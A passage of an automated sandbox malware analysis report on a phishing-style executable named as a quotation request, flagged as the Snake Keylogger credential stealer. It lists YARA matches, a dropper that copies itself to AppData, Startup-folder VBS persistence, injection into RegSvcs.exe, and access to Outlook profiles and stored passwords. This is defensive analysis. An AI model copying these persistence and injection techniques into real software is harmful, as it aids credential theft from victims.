                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D43209_2_066D4320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D2B379_2_066D2B37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D43309_2_066D4330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D5B079_2_066D5B07
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D73009_2_066D7300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D5B189_2_066D5B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D00409_2_066D0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D18289_2_066D1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D00079_2_066D0007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D30029_2_066D3002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D18189_2_066D1818
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D30109_2_066D3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D69629_2_066D6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D51779_2_066D5177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D69709_2_066D6970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D81499_2_066D8149
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D81589_2_066D8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D992F9_2_066D992F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D09C09_2_066D09C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D09D09_2_066D09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D21A79_2_066D21A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D39A09_2_066D39A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D21B89_2_066D21B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D51889_2_066D5188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D39969_2_066D3996
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06B573989_2_06B57398
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06B5CD789_2_06B5CD78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06B54CA09_2_06B54CA0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: String function: 00F2F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: String function: 00F19CB3 appears 31 times
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: String function: 00F30A30 appears 46 times
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: String function: 00D80A30 appears 46 times
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: String function: 00D69CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: String function: 00D7F9F2 appears 40 times
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F837B5 GetLastError,FormatMessageW,1_2_00F837B5
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F710BF AdjustTokenPrivileges,CloseHandle,1_2_00F710BF
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00F716C3
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DC10BF AdjustTokenPrivileges,CloseHandle,2_2_00DC10BF
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00DC16C3
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00F851CD
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_00F9A67C
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,1_2_00F8648E
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00F142A2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeFile created: C:\Users\user\AppData\Local\supergroupJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeFile created: C:\Users\user\AppData\Local\Temp\zZtJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002EE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeReversingLabs: Detection: 39%
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeFile read: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeProcess created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeProcess created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAutomated click: OK
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic file information: File size 1586688 > 1048576
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: vC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbH= source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
